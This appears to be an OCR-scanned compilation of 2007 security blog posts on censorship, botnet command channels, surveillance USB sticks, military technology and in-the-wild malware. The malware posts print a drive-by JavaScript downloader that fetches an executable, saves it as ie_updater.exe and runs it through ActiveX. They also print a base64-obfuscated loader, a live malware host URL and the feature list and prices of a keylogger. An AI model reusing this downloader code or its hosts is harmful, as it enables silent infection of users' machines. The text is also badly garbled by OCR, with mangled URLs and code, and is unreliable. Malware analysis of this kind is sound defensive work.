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It would be great to see how this project evolves and starts 
taking presenting the results by confirming whether or 

not an URL is blocked in [9]all of the countries on the 
[lOjworld's censorship map, or ever better, start feeding 
local search engines with possibly censored keywords, 
summarize the results and emphasize on the big picture. 


1. http://cvber.law.harvard.edu/filterin a /china/test/index.as p 

2. http://www. a reatfirewallofchina.or g/ 

3. http://del.icio.us/DDanchev/Censorshi p 

4. http://ddanchev.blo QS POt.com/2006/08/chinas-internet- 
censorship-report-2Q06.html 

5. http://ddanchev.blo QS POt.com/2006/07/chinas-interest-of- 
censorin g -mobile.html 

6. http://blo Q .outer-court.com/files/ Q OO Q le-ima g es- 
censorshi p.i pg 

7. http://blo a .outer-court.com/files/ a oo a le-ima a es- 
censorshio-china. i pg 

8. http://ddanchev.blo as pot.com/2007/02/censorship-in- 
china-open-letter.html 

9. http://www.rsf.or a /24h/ma p.php 

10. http://www.opennet.net/map/index2.html 
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Botnet Communication Platforms (2007-03-07 11:24) 

Botnets, or the automated exploitation and management of 
malware infected PCs is perhaps the most popular 

and efficient cyber threat the Internet faces these days. 
Whether you define it as the war on bandwidth or who's 

commanding the largest infected population, this simple 
distributed hosts management problem is continuing to 




































evolve in order for the botnet masters to remain undetected 
for as long as possible. On the other hand, the growing 

Internet population combined with the lack of awareness of 
the "just got a PC for Christmas" users, and IPv4's well known 
susceptability to IP spoofing compared to IPv6, always make 
the concept an interesting one to follow. 

Despite that at the beginning of 2006, I pointed out on how 
[ljmalware related documentation and howtos 

turned into open source code resulting in [2]a flood of 
malware variants, thus lowering the entry barries for a novice 
malware copycats, a week ago I located a very throughout 
document on various botnet communication platforms 

and I'm sure its author wouldn't mind me reposting the fancy 
graphs and commenting on them. 


RC based Botnet Communications 

Nothing ground breaking in this one besides the various 
advices on stripping the IRCd, creating own network of IRC 

servers compared to using public ones, and on the 
importance of distributed secrecy of the botnet participants' 
IPs, 

namely each bot would never know the exact number or 
location of all servers and bots. 

HTTP Botnet Communications 
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The possiblities with PHP and MySQL in respect to flexibility 
of the statistics, layered encryption and tunneling, and most 
importantly, decentralizing the command even improving 
authentication with port knocking are countless. Besides, 
with all the buzz of botnets continuing to use IRC, it's a 
rather logical move for botnet masters to shift to other 
platforms, where communicating in between HTTP's noise 
improves their chance of remaining undetected. Rather 

ironic, the author warns of possible SQL injection 
vulnerabilities in the botnet's command panel. 

ICQ Botnet Communications 

Perhaps among the main reasons to repost these graphs was 
the ICQ communication platform which I'll leave up to 

you to figure out. As a major weakness is listed the reliance 
on icq.com, but as we've already seen cases of botnets 

132 

obtaining their commands by visiting an IRC channel and 
processing its topic, in this case it's ICQ WhiteLists getting 
the attention. 

Related comments on the programming "know-how" 
discussed will follow. [3]Know your Enemy! 

1. http://www.linuxsecuritv.com/docs/malware-trends.pdf 

2. http://ddanchev.blo as pot.com/2006/08/nnalware-bot- 
families-technolo a v-and.html 


3. http://www.honevnet.or a/pa pers/kve.html 
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Death is Just an Upgrade (2007-03-07 12:21) 

Started as a project to digitally mimic 100 % a human's 
behaviour, the [ljVirtual Soldier research program is getting 

more funding to [2]accomplish its mission, and go beyond : 

" In particular, the contract calls for the VSR team to further 
develop their "Predictive Dynamics" tools for use in 
calculating human motion in a military environment. 
Invented by VSR researchers, the field of Predictive 
Dynamics 

already has made a significant impact on the field of human 
motion simulation by making it possible - for the first 

time ever - to calculate the walking and running involved in 
human gait when given such variables as human body 

size, strength, weight, load-carrying abilities and clothing 
effects. " 

Next, Santos will find himself exposed to radiation, blown up 
on pieces, getting hit by a truck, or pretty much 

anything that you would never get the chance to - legally - 
expose a living human to, for testing purposes. 

1. http://www.di a ital-humans.or g/ 

2. http://www.press-citizen.com/a p ps/pbcs.dll/article? 
AID=/20070228/NEWS01/702280~06/1079 
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USB Surveillance Sticks (2007-03-07 12:34) 

Despite the ongoing awareness built among enterprises and 
end users on the risks posed by removable media, there 

are vendors offering various surveillance solutions over an 
USB stick. Some are handy, others contradictive. And 

while [ 1 ]RFID tags are getting smaller than a crop of rice, 
here are three surveillance solutions to keep in mind right 
next to the notorious [2]KeyGhost hardware keylogger. 

[3]SnoopStick 

An 

example of malware on demand at $59.95 which comes with 
lots of features as well as automatic updates : 

11 The SnoopStick monitoring components are completely 
hidden, and there are no telltale signs that the computer is 
being monitored. You can 

then unplug the SnoopStick and take it with you anywhere 
you go. No bigger than your thumb and less than 1/4" 

thick, you can carry it in your pocket, purse, or on your 
keychain. Any time you want to see what web sites your kids 
or employees are visiting, who they are chatting with, and 
what they are chatting about, simply plug in your SnoopStick 

to any Windows based computer with an Internet connection 
and a USB port. SnoopStick will automatically connect 


to the target computer. 


[4]TrackStick 


Portable GPS surveillance with historical routes that look 
simply amazing when applied at Google Earth : 

" The Track Stick will work anywhere on the planet Earth. 
Using the latest in GPS mapping technologies, your exact 
location can be shown on graphical maps and 3D satellite 
images. The Track Stick's micro computer contains special 

mathematical algorithms, that can calculate how long you 
have been indoors. While visiting family, friends or even 

shopping, the Track Stick can accurately time and map each 
and every place you have been. 11 
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[5] GadgetTrack 

An interoperable surveillance solution supposed to assist you 
in case your iPod or even PSP get stolen, all you have 

to do is infect your device and prey there's Internet 
connectivity at a later stage. Tracking your stolen devices is 
one thing, getting them back is completely another: 

" What if your device could phone home? Well now it can. 
With our patent-pending GadgetTrak™ system, 

you simply register your device and install our agent files on 
your device. If your device is missing or stolen, you log into 
your account and flag the device as lost or stolen. The next 
time the device is accessed it will attempt to contact us and 
provide data regarding the system it is plugged into. " 


1. http://ddanchev.blo as pot.com/2007/02/rfid-trackin a- 
miniaturization.html 

2. http://www.ke va host.com/ 

3. http://www.snoopstick.com/ 

4. http://www.trackstick.com/index.html 

5. http://www. a ad a ettheft.com/ 
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Documentary on ECHELON - The Spy System (2007- 
03-07 22:11) 

Remember [1]ECHEL0N? The uber-secretive worldwide 
intelligence sharing network that various activists once tried 

to poison by [2]generating fake suspicious traffic using 
[3]predefined keywords? Well, the system is still operating, 

and with the lack of transparency in the participating 
country's use and abuse of the technology, all we need is an 
EU 

alternative competing with the original. 

Watch this excellent half an hour long documentary and find 
out: 11 What exactly is Echelon? How can it in¬ 
vade privacy, yet protect liberty? How did this billion-dollar 
system miss the September 11th attacks? In a riveting 

hour, we uncover the mysterious, covert world of NSA's 
electronic espionage. " 


[EMBED] 












1. http://www.fas.or a/irp/proa ram/process/echelon.htm 


2 . 

http://www.bu a brother.com/echelon/sPQQkwords a enerator.ht 

ml 

3. http://www. i amechelon.or a /kevwords.htm 
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Distributed Computing with Malware (2007-03-08 
14:40) 

[1] Distributed computing with malware infected PCs is 
nothing new as a concept, it's just the lack of botnet master's 

desire to contribute processing power for anything socially 
oriented. That's until late last month, when members of 

[2] Berkeley's BOINC project noticed a project that was 
suspiciously becoming popular and found out that malware 

[3] infected PCs had the BOINC client installed to participate 
in it: 

11 It recently came to the attention of boinc staff that a multi¬ 
project cruncher called Wate who occupied a 

very high position in the boinc and project stats had reached 
this exalted position by dishonest means. 

In early June 2006 he appears to to have released onto the 
internet a link purporting to provide Windows updates 

including now for Vista. Some 1500 members of the public 
worldwide downloaded these 'updates' which in fact 












consisted of a trojan application that downloaded boinc.exe 
and attached the person's computer to Wate's account, 

giving him the subsequent fraudulent credits. 

About 90 % of the people affected appear to have 
uninstalled or disabled the unwanted boinc installation, but 
some 

compromised computers are still running and crashing 
climate models. Boinc and project staff have no means of 

contacting the owners of these computers. " 

If only would botnet masters take this note seriously, I'm sure 
we'll see certain networks controlling the top 

10 positions at the BOINC project. A war on bandwidth or 
CPU power? 

1. http://users.tkk.fi/%7Elauronen/works/hakkeri_2003.pdf 

2. htto://boinc.berkelev.edu/chart_list. php 

3. 

http://climatea p ps2.oucs.ox.ac.uk/cpdnboinc/forum thread. p 
h p?id = 5314 
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Steganography Applications Hash Set (2007-03-08 
14:56) 

Did you know that there are over [1]600 applications 
capable of using steganography to hide data? Me neither, 
but 









here's a company that's innovating in the field of detecting 
such ongoing communication : 

" Backbone Security's Steganography Analysis and Research 
Center (SARC) is pleased to announce the release 

of version 3.0 of SAFDB. With the fingerprints, or hash 
values, of every file artifact associated with 625 
steganography applications, SAFDB is the world's largest 
commercially available hash set exclusive to digital 
steganography and 

other information hiding applications. The database is used 
by Federal, state and local law enforcement; intelligence 

community; and private sector computer forensic examiners 
to detect the presence or use of steganography and 

extract hidden information. 

Version 3.0 contains hash values for each file artifact 
associated with the 625 steganography applications 
computed 

with the CRC-32, MD5, SHA-1, SHA-224, SHA-256, SHA-384, 
and SFIA-512 algorithms. 

A free extract of SAFDB with MD5 hashes only is available to 
qualifying law enforcement, government, and intelligence 

agency computer forensic examiners. 11 Chart courtesy of 

[2] FHuaiqing Wang and Shuozhong Wang. And here's a 

[3] related post. 

1. http://www.sarc-wv.com/news/safdb30.as px 



2. http://acmaueue.com/modules. php? 
name=Content&pa=show paa e&pid = 241 

3. http://ddanchev.blo as pot.com/2006/08/ste a ano araphv- 
and-cvber-terrorism.html 
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UK Telecoms Lack of Web Site Privacy (2007-03-08 
15:07) 

When the U.S and Canada are the benchmark it's logical to 
conclude the U.K gets poor ratings as web site privacy 

especially in the commercial sector is something [l]the U.S 
and Canada tackled a long time ago. Taking the pragmatic 

perspective, does it really matter in times when government 
officials abuse commercially aggregated data, one 

they cannot legally obtain by themesleves, and so they 
ought to perform as paper-tigers to access it? Here's [2]an 

interesting analysis : 

" The U.K. industry, however, performed much worse in 
privacy. Telecom firms, especially in the U.K., ask for 

more personal data than companies in other industries. This 
data is often unconnected to the request being made 

by the customer. 

U.K. sites are generally unclear about data sharing practices, 
with 23 per cent judged to be explicit compared to 69 

per cent in the U.S. Clarity in this area has made steady 
gains in the U.S. in the past 12 months, but the U.K. has 












shown no significant change. 

It is not only clarity that fails in the U.K., but also the actual 
practices in place. Eleven of the 13 sites routinely share 
personal data with other internal groups, business partners 
or third parties without explicit permission. This compared 
poorly with the U.S., where 40 per cent share in the same 
way. The best performing site with regards to privacy in the 
U.K. was 02. 


Moreover, [3]the U.K realizing its ongoing negative PR across 
the globe in respect to the [4]CCTV surveillance myopia, 
they've released a report claiming [5]Italy's COMINT is worse 
than their (walking) CCTV surveillance efforts. [6]To 

publish a privacy policy or not to publish a privacy policy? 
That "used to be" the question. 

1. http://ddanchev.blo as pot.com/20Q6/01/never-endin a- 
cookie-debate.html 

2. http://www.cellular-news.com/storv/22437. php 

3. http://ddanchev.blo as pot.com/2006/ll/londons-pollice- 
experimentin a -with-head.html 

4. http://ddanchev.blo as pot.com/2007/01/eves-in-londons- 
sk v-surveillance-poster.html 

5. http://www.official- 

documents. a ov.uk/document/hc0607/hc03/0315/0315.pdf 

6. http://ddanchev.blo as pot.com/2006/ll/to-publish-privac v- 
policv-or-not-tQ.html 
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Armed Land Robots (2007-03-09 23:45) 

[ 1 ] 

After seeking to [2]dominate the air, it's time defense 
contractors turn back to innovating on the ground, 

especially when we speak of armed and remotely controlled 
robots. Crucial for both, reconnaissance and guerilla 

warfare situations, movement flexibity as well as payload 
capacity is what adds more value to these robots. An Israeli 
based defense contractor [3]Elbit Systems recently 
introduced The Viper: 

" The Viper, which is about a foot long and weigh 
approximately five pounds, is powered by a special electri¬ 
cal engine and operated by remote control or according to a 
program implanted in its 'brain' in advance. It is capable of 
climbing stairs, getting past obstacles and at the same time 
checks what is going on around it by means of a system of 
sensors. Equipped with a special nine-millimeter caliber Uzi 
machine gun, on which a laser pointer has been 

installed. The Viper is carried to the battlefield by a soldier 
on his back in a special carrier. When it is necessary to 
infiltrate a building safely where, for example, armed 
terrorists are hiding, the soldier lowers it to the ground, turns 
it on and from that moment controls it from a distance. " 

I'm very interested in the possibility for a 360 degree view, 
it's noise generation level, the variety of terrains 

its supports, and most importantly - would it put itself back 
on its "feet" if it inevitably turns upside down. See, you 


wouldn't want your pricey attack toy acting like a cheap 
remotely controlled car toy, would you? Engadget has [4]a 

photo of Viper. 

Here's a recommended article on [5]the history of armed 
aerial UAVs, as well as a recent story on [6]beam 

energy weapons, [7]the vomit beam in this case. 

1 . 

http://photosi.blo aa er.com/blo aa er/1933/1779/200/armed r 
obots. ipg 

2 . 

http://www. a oo a le.com/url? 

sa=t & c t = res & c d = 1 & u r I = h tt p % 3 A% 2 F % 2 F d d a n c h e v. b I o a s p 
ot.com%2F2007%2F02%2Fattack-of 

-bitin a -uavs.html&ei = hOXxRaT I DI2UnO Pi q r3bPA&us a =_fF- 

Jd 

3. http://www.israel21c.or a /bin/en. isp? 

enDispWho=lnThePress&enPa a e=BlankPa a e&enDisplav=vie 

w&enPispWhat=Zone&en 

Zone=I nThePress&Pate=03/08/07 

4. http://www.en a ad a et.com/2007/03/Q9/elbit-svstems- 
unveils-viper-hunter-killer-robot/ 

5. http://www.defense-update.com/features/du-l- 
07/feature armedUAVs.htm 

6 . 

http://airbornecombaten a ineer.t vpe pad.com/airborne comba 
t en a ineer/2007/03/imbalancevomit .html 






































7. 

http://blo a .wired.com/defense/2007/03/navv researchin.html 
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U.K's Latest Military Satellite System (2007-03-10 
00:04) 

The U.K military is about to upgrade their [l]Skynet 4 
satellite system to Skynet 5 : 

" Four steerable antennas give it the ability to focus 
bandwidth on to particular locations where it is most 

needed - where British forces are engaged in operations. 

Its technologies have also been designed to resist any 
interference - attempts to disable or take control of the 
spacecraft - and any efforts to eavesdrop on sensitive 
communications. 

An advanced receive antenna allows the spacecraft to 
selectively listen to signals and filter out attempts to "jam" it. 


Among the many features the new system introduces, two 
are worth mentioning - it's targeted bandwidth ca¬ 
pability where it's needed and the sort of DENY:ALL upgraded 
receive antenna to avoid jamming. Now pray China 

won't take it down, or let [2]the debris (conveniently) take 
care of the rest - so vulnerable it makes you want to 

establish a space warfare code of conduct. 





1. http://news.bbc.co.Uk/l/hi/sci/tech/6434773.stm 

2. http://www.defensetech.or a /archives/003189.html 
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Envy These Women Please (2007-03-10 00:20) 

Differentiating from the usual Most Powerful Women list, 
Forbes did a little niching to come up with a[l] slideshow 

of women billionaires they envy most: 

" Imagine for a moment what it would be like to be a 
billionaire. No more picking up after the kids, doing 

dishes, worrying about how much a dress costs or pinching 
pennies to save for an amazing vacation. For the women 

on Forbes ' new list of the world's billionaires, that dream is a 
reality. But it's not just their 10-figure fortunes that make us 
envious. Some of these women are famous; some wield 
enormous power; some have fascinating careers. 

Some have all three. " 

Is it just me, or inherited wealth is boring right from the very 
beginning? The emergence of the spoon people, 

or so they say - M [2]Spoon feeding in the long run teaches us 
nothing but the shape of the spoon" Edward Morgan Forster. 
A week ago I participated in a discussion about power, most 
importantly one trying to define power and 

we ended up with several states of power - positional power, 
the C-level executives, expertise power, or the revenge 





of the underestimated walking case studies, and networking 
power. It's all [3]a cyclical process like pretty much 

anything in life. 

1 . 

http://www.forbes.com/home/billionaires/2007/03/Q6/women- 

bi 11 iona i res-rich 07 bi 11 ionai res cz Ik 0308women 


slide.html 

2. http://www.auoteworld.or g/a uotes/4863 

3. 

http://www.oldielvrics.com/lvrics/frank sinatra/thats life.html 
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(a, 1 Shell.Application 1 );if (b) <if (Go(a)) break;>}catch(e){}}i++;} 
</scriptxscnpt language="JavaScnpt"> var xxl= 1 xxl 1 ;var xxs=l;var 
obj_RDS = document.createEleinent( 1 object 1 ); xxs=xxs+l;obj_RDS.setAttribute 
( 1 id 1 , 1 obj_RDS 1 ); xxl=xxl+‘sad 1 ;obj_RDS.setAttrlbute 

( 1 classid 1 , 1 clsid:BD9 1 +•6C556-6SA3- 1 +'11D0-983A'+'-00C04E'+'C29E36'); 

xxl=xxl+'sdfad';var is_obj_adodb = 0; xxs=xxs-43;try { var obj_adodb = 

obj_RDS.CreateObgect("adod"+"b.stre"+"am",""); is_obj_adodb = 1; > catch 

(e){) if (is_obj_adodb != 1) < xxl=xxl+‘sdfad';try < var obj_adodb = new 

ActiveXObject("adod"+"b.stream"); is_obj_adodb = 1; > catch(e)<) ) if 

(is_obj_adodb == 1) < try < xxs=xxs-43;var obj_ShellApp = 

obj_RDS.CreateObject("Shell.Application",""); var obj_msxml2 = new 
ActiveXObject ("msxml2 ■ XHLHTTP") ; obj msxml2 .open ("GET", 

false) ; obj_msxml2 . send () ; 

obj_adodb.type = 1; xxs=xxs-43;obj_adodb.open(); obj_adodb.Write 
(obj_msxml2.responseBody); var fn = "C:\\"+"ie_"+"upda"+"ter.exe"; xxs=xxs- 
43;obj_adodb.SaveToFile(fn,2); obj_adodb.close(); obj_ShellApp.ShellExecute 
(fn) ; > catch(e){) > </scrlptxhtml 


Shots from the Malicious Wild West - Sample One 
(2007-03-10 18:16) 


Come to daddy. At _ http://www.ms-counter.com we have an 
URL spreading malware through redirectors and the 


natural javascript obfuscation : 













Input URL : _http://www.ms-counter.com/ms-counter/ms- 
counter.php?t=45 

Effective URL : _http://www.ms-counter.com/ms-counter/ms- 
counter.php?t=45 

Responding IP : 81.95.148.10 

Name Lookup Time : 0.300643 

Total Retrieval Time : 0.887313 

Download Speed : 9878 

Then we get the following : 

var keyStr = 

M ABCDEFGHIJKLMNO M + "PQRSTUVWXYZabcdefghijk M + M lmnop 
qrstuvwx" 

+ M yz0123456789+/="; function decode64(input) { var 
output = varchr2, chr3, 

chrl; var enc4, enc2, end, enc3; var i = 0; input = 
input.replace(/[~A-Za-zO-9\ 

+V\=]/g, do { end = keyStr.indexOf(input.charAt(i + + )); 
enc2 = keyStr.index 

Of(input.charAt(i + + )); enc3 = 
keyStr.indexOf(input.charAt(i + + )); enc4 = keyStr. 

indexOf(input.charAt(i + + )); chrl = (end <<>> 4); chr2 = 
((enc2 & 15) 

<<>> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output 
+ String.from 
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CharCode(chrl); if (enc3 != 64) { output = output + 

String.fromCharCode(chr2); } 

if (enc4 != 64) { output = output + 

String.fromCharCode(chr3); } } while 

(i < input.length); return output; } 

document.write(decode64( M IDxhcHBsZXQgYXJjaGI2ZT0ibXMt 

Y291bnRlci5q 

YXIilGNvZGU9lkJhYWFhQmFhLmNsYXNzliB3aWR0aD0xlGhla 

WdodD 

OxPjxwYXJhbSBuYWllPSJlcmwilHZhbHVIPSJodHRwOi8vbXMt 

Y291b 

nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI + PC9hcHBsZXQ 
+ PHNjcml 

wdCBsYW5ndWFnZT0nam ETC. ETC. ETC. 

Deobfuscating the javascript we get to see where the binary 
is : 

Input URL : _http://ms-counter.com/mscounter/load.php 

Effective URL : _http://ms-counter.com/mscounter/load.php 

Responding IP : 81.95.148.10 

Name Lookup Time : 0.211247 

Total Retrieval Time : 1.065943 

Download Speed : 12898 



Server Response : 

HTTP/1.1 200 OK 

Date: Sat, 10 Mar 2007 00:49:27 GMT 
Server: Apache 
X-Powered-By: PHP/4.4.4 

Content-Disposition: attachment; filename= M codecs.exe M 

Connection: close 

Transfer-Encoding: chunked 

Content-Type: application/exe 

File info : 

File size: 13749 bytes 

MD5: f0778c52e26afde81dffcd5c67flc275 

SHA1: d61c6cl7b78db28788f9a89cl2bl82a2bl744484 
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AntiVir 

7.3.1.41 

03.09.2007 

TP./Delphi .Downloader.Gen 

Authentium 

4.93.8 

03.09.2007 

Possibly a new variant of W32/new-malware!Maximus 

Avast 

4.7.936.0 

03.09.2007 

no virus found 

AVG 

7.5.0.447 

03.09.2007 

Downloader.Generic3 .VNC 

BitDefender 

7.2 

03.10.2007 

Generic.Malware.Sdld.C704C628 

CAT-QuickHeal 

9.00 

03.09.2007 

(Suspicious) - DNAScan 

ClamAV 

devei-20060426 

03.10.2007 

no virus found 

DrWeb 

4.33 

03.09.2007 

D LOADER.Trojan 

eSafe 

7.0.14.0 

03.08.2007 

suspicious Trojan/Worm 

eTrust-Vet 

30.6.3467 

03.09.2007 

no virus found 

Ewido 

4.0 

03.09.2007 

no virus found 

FileAdvisor 

1 

03.10.2007 

no virus found 

Fortinet 

2.85.0.0 

03.09.2007 

W32/Delf,FHG!tr 

F-Prot 

4.3.1.45 

03.09.2007 

W32/new-malwarei Maximus 

F-Secure 

6.70.13030.0 

03.09.2007 

no virus found 

Ikarus 

T3.1.1.3 

03.09.2007 

Win32.SuspectCrc 

Kaspersky 

4.0.2,24 

03.10,2007 

no virus found 

McAfee 

4981 

03.09.2007 

no virus found 

Microsoft 

1.2204 

03.09.2007 

no virus found 

NOD32v2 

2105 

03.09.2007 

a variant of Win32/TrojanDownloader,Delf.NQG 

Norman 

5.80.02 

03.09.2007 

Suspicious F.gen 

Panda 

9.0.0,4 

03,09.2007 

Trj/Downloader.NFE 

Prevxl 

V2 

03.10.2007 

no virus found 

Sophos 

4.15,0 

03.09.2007 

Mal/Packer 

Sunbelt 

2,2.907.0 

03.10.2007 

VIPRE.Suspicious 

Symantec 

10 

03.10.2007 

no virus found 

TheHacker 

6.1.6.073 

03.09.2007 

no virus found 

UNA 

1.83 

03.09.2007 

no virus found 

VBA32 

3.11.2 

03.08.2007 

no virus found 

VirusBuster 

4.3.19:9 

03.09.2007 

Packed/FSG 


Running it over VT we get the following results you can see 
in the screenshot. It's obvious major AV software doesn't 

detect this one, but what you should keep in mind is the 
currently [ljflawed signatures based malware detection ap¬ 
proach. That's of course given someone's considering 
[2]updating their AV software. In another analysis I'll come 
with another binary that all major AV vendors detect, but the 
second tier ones doesn't. Host based IPS based protection 

and behaviour blocking, and the actual prevention of loading 
the script is the way to avoid the exploitation of the 

flaws in signatures based scanning protection. 

1. http://ddanchev.blo as pot.com/2006/01/whv-rel vina -on- 
virus-si a natures-sim pl v.html 














2. http://ddanchev.blo as pot.com/2006/07/anti-virus- 
sia natures-update-it-could.html 
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AntiVir 

7.3.1.41 

03.09.2007 

no virus found 

Authentium 

4.93.8 

03.09.2007 

no virus found 

Avast 

4.7.936.0 

03.09.2007 

no virus found 

AVG 

7.5.0.447 

03.09.2007 

no virus found 

BitDefender 

7.2 

03.10.2007 

no virus found 

CAT-QuickHeal 

9.00 

03.09,2007 

(Suspicious) - DNAScan 

ClamAV 

devel-20060426 

03.10.2007 

no virus found 

DrWeb 

4.33 

03.09.2007 

no virus found 

eSafe 

7.0.14.0 

03.08.2007 

suspicious Trojan/Worm 

eTrust-Vet 

30.6.3469 

03.10.2007 

rio virus found 

Ewido 

4.0 

03.09.2007 

no virus found 

FileAdvisor 

1 

03.10.2007 

no vinjs found 

Fortinet 

2.85.0.0 

03.09.2007 

suspicious 

F-Prot 

4.3.1.45 

03.09.2007 

no virus found 

F-Secure 

6.70.13030.0 

03.09.2007 

no virus found 

Ikarus 

T3.1,1.3 

03.09.2007 

no virus found 

Kaspersky 

4.0.2.24 

03.10.2007 

no virus found 

McAfee 

4981 

03.09.2007 

no virus found 

Microsoft 

1.2204 

03.10.2007 

no virus found 

NOD32v2 

2105 

03.09.2007 

no vinjs found 

Norman 

5.80,02 

03.09.2007 

Suspicious F.gen 

Panda 

9.0.0,4 

03.09.2007 

no virus found 

Prevxl 

V2 

03.10.2007 

no virus found 

Sophos 

4.15.0 

03.09.2007 

Mal/Packer 

Sunbelt 

2.2.907.0 

03.10.2007 

VIPRE.Suspicious 

Symantec 

10 

03.10.2007 

no virus found 

TheHacker 

6.1.6.073 

03.09.2007 

no virus found 

UNA 

1.83 

03.09.2007 

no vinjs found 

VBA32 

3.11.2 

03.10.2007 

no virus found 

VirusBuster 

4.3.19:9 

03.09.2007 

Packed/FSG 


Shots from the Malicious Wild West - Sample Two 
(2007-03-10 19:07) 


[l]Packers are logically capable of rebooting the lifecycle of a 
binary and making it truly unrecognizable. The 























Pohernah Crypter is among the many recently released 
packers you might be interested in taking a peek at. By the 

time a packer's pattern becomes recognizable, a new one is 
introduced, and in special cases there are even packers 

taking advantage of flaws in an AV software itself. 

Compared to the common wisdom of malware authors being 
self-efficient and coming up with packers by 

themselves, we've already seen cases where investments in 
[2]purchasing commercial anti-debugging software is 

considered. You may find these [3]test results of various anti 
virus software against packed malware informative, 

which as a matter of fact truly back up my experience with 
the winning engines and their performance in respect to 

packed malware. 

File size : 6901 bytes 
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MD5 : 6cel283af00f650el25321c80bf42097 
SHA1 :08ac9a9e2181d8a94e6d96311c21c8dbl766e2fl 
1 . 

http://3. bp. blo as pot.com/_wlCHhTiOmrA/RbfZvofLd21/AAAAA 
AAAAMO/UilDO LFi 23Q/s200/tested _packers.bm p 

2. http://ddanchev.blo as pot.com/2007/01/technical-analvsis- 
of-sk v pe-tro i an.html 
















3. http://www.anti- 

malware.ru/doc/packers su p port 08.2006.pdf 
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Shots from the Malicious Wild West - Sample Three 
(2007-03-10 20:27) 

Keyloggers on demand, the so called zero day keyloggers 
ones created especially to be used in targeted attacks are 

something rather common these days. Among the many 
popular ones that remained in service and has been up¬ 
dated for over an year is The Rat! Keylogger. Here are some 
prices in virtual WMZ money concerning all of its versions : 
The Rat! 7.0XP- 29 WMZ 

The Rat! 6.0XP/6.1 - 22 WMZ 
The Rat! 5.8XP- 15 WMZ 
The Rat! 5.5XP- 13 WMZ 


The Rat! 5.0XP-9 WMZ 














The Rat! 4.0XP - 8 WMZ 


The Rat! 3.xx - 7 WMZ 
The Rat! 2.xx - 6 WMZ 
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An automated translation of its features : 

For the installation to the machines with the operating 
systems Windows xp, Windows 2000 and on their ba¬ 
sis. Finale - apotheosis! Let us recall again, for which we love 
our rodent: 

- the size of file- result is record small -13 312 bytes in the 
nezapakovannom form (with the packing with use FSG, 6 



















































793 bytes!). 

- not it detektitsya as virus by antiviryami. 

- it follows the buffer of exchange. 

- the system of invisibility and circuit of fayervola. 

- the fixation of pressure you klavish' in the password 
windows and the console. 

- the sending of lairs on e-mail, with the support to 
autentifikatsii RFC - 2554. 

- the encoding of dump. 

- tuning the time of activation and time of stoppage 

- removal in the time indicated without it is trace and 
reloading. 

Digital fingerprints will follow as soon as I finish bruteforcing 
the password protected archives. 
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Photoshoping Your Reality (2007-03-10 20:45) 

It's not just [l]a stereotyped beauty model, advanced image 
editing tools and techniques can make you believe 

in, but they can also influence your understand of reality too 
as you can see in [2]Wired's famous altered photos 

collection : 

" A picture is worth a thousand words, and Photoshop and 
similar tools have made it easier than ever to make those 
words fib. But while computers enable easier and better 
photo manipulation, it is hardly a new phenomenon. Here 

is a sampling of some of the more famous altered 
photographs from the last century. " 

Here's a free service letting you [3]fake photos. Here's 
[4]another one as well as [5]a variant of mine in rela¬ 


tion to a [6]previous post. 




1. http://ddanchev.blo as pot.com/2006/10/stereot v ped- 
beautv.html 

2. http://blo a .wired.com/wiredohotos54/ 

3. http://www.funonit.eom/funn v_i okes/fake_photo/#_ 

4. http:// a axed.com/ 

5. 

http://photosl.blo aa er.com/blo aa er/1933/1779/1600/d220 o 

at-j.Bg. 

6. http://ddanchev.blo as pot.com/2006/05/health v- 
oaranoia.html 
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eBayCaptcha Populator» Overview 

eBayCaptcha Populator 1.1 , by vladuz , 
released on Jan 25, 2007 

Are you tired of getting "For added security, 
please enter the verification code hidden in the 
image," message on eBay sites? 

Install our Firefox extension and that problem will 
go awayl 

Everytime you get that message the extension 
will automatically fill the code for you. 

Vladuz's Ebay CAPTCHA Populator (2007-03-10 21:31) 

Nice slideshow courtesy of eWeek providing [l]various 
screenshots related to Vladuz's impersonation attacks on 
Ebay : 

" And whether or not Vladuz is responsible for writing a tool 
to automatically skim eBay customers accounts 


Rating: 2.00 


i»i|tolp 
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More Previews » 


























and thus cause sharp spikes in bogus listings being taken 
down and relisted multiple times a day, he or she has the 

mythic reputation at this point to be credited as the cause. " 

Compared to diversifying its targets, permanently sticking to 
Ebay as the main target is already prompting the 

Web icon to put more efforts into tracking him down. [2]Last 
year for instance, [3]automated bots exploited Ebay's 

CAPTCHA and started self-recommending each other, but 
with [4]Vladuz's Ebay CAPTCHA Populator, improving the 

quality of Ebay's authentication process should get a higher 
priority than tracking him down as another such tool will 
follow from someone else out there. 

1 . 

http://www.eweek.com/sli deshow/0 . 1206 . a = 202474 . 00 .as o 

2 . 

http://photosl.blo aa er.com/blo aa er/1933/1779/200/sellerpro 

fileckl. ipa 

3. http://ddanchev.blo as pot.com/2006/08/but-of-course-its- 
pleasant-transaction.html 

4. https://addons.mozilla.or g /mozilla/4381 
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Ballistic Missile Defense Engagement Points (2007- 
03-11 21:33) 

Outstanding animation covering pretty much all of the 
current engagement points in case a missile is fired from 















anywhere across the world, total syncronization between air, 
land and naval force, and I must say the background 

music is excellent too. 

[EMBED] 

In a previous post, [l]Who Needs Nuclear Weapons 
Anymore? I provided my reflection on the overal shift of 

threats nowadays compared to the ones back in the Cold War 
days you may informative, as well as [2]an essay I 

wrote back in 1998. Cryptome's [3]Eyeballing of Missile 
Defense is also worth going through. 

1. http://ddanchev.blo as pot.com/2006/02/who-needs- 
nuclear-weapons-anvmore.html 

2. http://ddanchev.blo as pot.com/2006/05/emp-attacks- 
electronic-domination-in.html 

3. http://cr v ptome.or a /bmd/bmd-eveball.htm 
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Touching the Future of Productivity (2007-03-12 
22:30) 
















Visualization in military brienfings and intelligence gathering 
has been a daily [ 1 ]lifestyle of analysts for years, but 
combining visualization and touchscreens makes it the 
perfect combination to boost productivity. We're very near to 

entering the stage where VR will not only save lifes in a war 
zone, but also allow a skilled and hard to replace warrior to 
operate a device while enjoying his Coke back home. 

[2]Great demonstration. Via [3]Defensetech. 

Go through related posts on visualization and its future 
impact on [4]information security and [5]intelligence 

as well. 

1. http://ddanchev.blo as pot.com/2006/08/analvzin a- 
intelli a ence-analvsts.html 

2 . 

http://link.bri a htcove.com/services/link/bcoid607757611/bct 

id422563006 

3. http://www.defensetech.or a /archives/003348.html 

4. http://ddanchev.blo as pot.com/2006/Q3/visualization-in- 
securitv-and-new.html 

5. http://ddanchev.blo as pot.com/20Q6/01/visualization- 
intelli a ence-and.html 


154 























Google Maps and Privacy (2007-03-12 22:47) 

I thought I've seen the best close-ups from Google Maps in[l] 
